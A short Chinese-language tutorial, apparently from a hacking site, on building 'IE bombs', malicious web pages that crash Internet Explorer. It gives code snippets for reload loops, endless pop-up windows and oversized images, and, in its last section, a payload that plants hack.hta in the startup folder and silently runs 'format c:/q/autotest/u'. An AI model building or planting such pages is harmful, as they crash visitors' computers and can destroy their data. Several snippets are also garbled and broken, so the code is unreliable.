IE炸弹

一、IE炸弹的原理

在一些恶意网页中，埋伏了IE窗口炸弹。当用IE浏览这些网页时，会不断地弹出新的窗口，或者打开非常耗费系统资源的窗口，最后造成Windows资源耗尽，导致系统不稳定而死机。

IE窗口炸弹的主要形式有以下几种：1.死循环 死循环使者在网页的代码中，有一段代码的执行会陷入无穷的循环，最终导致资源耗尽。2.打开窗口死循环 打开窗口死循环是比较常见的IE窗口炸弹，当特定的网页代码被执行时，就会不停的打开新的窗口。3.超大图片 这种炸弹通常在网页中把图书的设置为一个很大的数字，当IE打开此网页时，就会不断地解析试图打开，但由于图片实在是太长了，超出了其处理能力，最终导致电脑死机。4.格式化硬盘 当浏览某网页时，某程序员把特定的文件悄悄的写入到电脑中，暗中格式化硬盘。这主要是利用微软未公开的格式化命令参数使得格式化硬盘时不会出现提示，并且使格式化时处于最小化的状态。

二、IE炸弹的制作

1.死循环

新建一个网页，在网页中加入以下代码“<html><body><img src=**** location="index.htm"></body></html>”，在以上代码所示的王一种，代码“<img src=**** location="index.htm">”正是导致死循环的原因。

2.打开窗口死循环

新建一个网页，在网页中加入以下代码“<html><body><img src=**** n=1 "do{windows.open('''')}while(n==1)" width="1"></body></html>”。当网页代码被执行时，就会不停地打开新的窗口，用不了多久电脑就会死机。

3.超大图片

新建一个网页，在网页中加入以下代码，“<html><body> <img src=**** width="2" height="*****(很大的数字)" </body></html>”。设置吃哦出CPU处理范围的大图片来使CPU超出负荷。当IE执行此语句时，就会不断地解析试图打开，但由于图片实在是太大了，超出了其处理能力，最终导致电脑死机。

4.格式化硬盘

由于该方式危害实在太大了，仅写出关键代码。新建一个网页，在网页中加入以下代码，①“src.Path="C:\\\\WINDOWS\\\\StartMenu\\\\Programs\\\\启动\\\\hack.hta”，这一项就是指当网页执行时，它会写入到电脑的启动目录下，并命名为hack.hta。②“wsh.Run(''start.exe/m format c:/q/autotest/u'')”，通常要格式化硬盘都会先询问是否要执行，但其中“/autotest”这项，是微软一个没有公开的功能，输入“format”后的动作便会被强制执行。这项中的“/q/u”是令系统不需要检查硬盘便会立即执行的指令。最后，“start.exe”再配合“/m”选项可以使format的DOS-prompt视窗在执行的是有处于最小化的状态。